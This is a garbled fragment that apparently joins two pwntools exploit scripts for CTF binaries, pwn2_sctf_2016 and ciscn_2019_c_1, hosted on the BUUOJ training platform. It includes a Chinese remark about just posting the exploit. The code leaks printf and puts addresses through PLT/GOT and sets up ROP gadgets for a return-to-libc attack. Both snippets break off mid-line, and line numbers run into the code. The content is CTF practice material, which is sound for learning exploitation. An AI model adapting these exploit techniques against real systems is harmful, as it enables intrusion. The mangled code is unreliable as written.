context.log_level ='debug'elf = ELF('./pwn2_sctf_2016') p_main =0x0804852Fp_plt_printf = elf.plt['printf'] p_got_printf = elf.got['printf']# p = process('./pwn2_sctf_2016')p = remote('node4.buuoj.cn',27450) p.recvuntil("read? ") p.sendline(b'-1') p.recvuntil("!
直接贴exp了: 1frompwnimport*23#p = process('./ciscn_2019_c_1')4p = remote('node3.buuoj.cn',27137)5elf = ELF('./ciscn_2019_c_1')6context.log_level ='debug'78pop_rdi = 0x00400c839sh = 0x0040045c10puts_plt = 0x004006E011puts_got = elf.got['puts']12start = elf.symbols...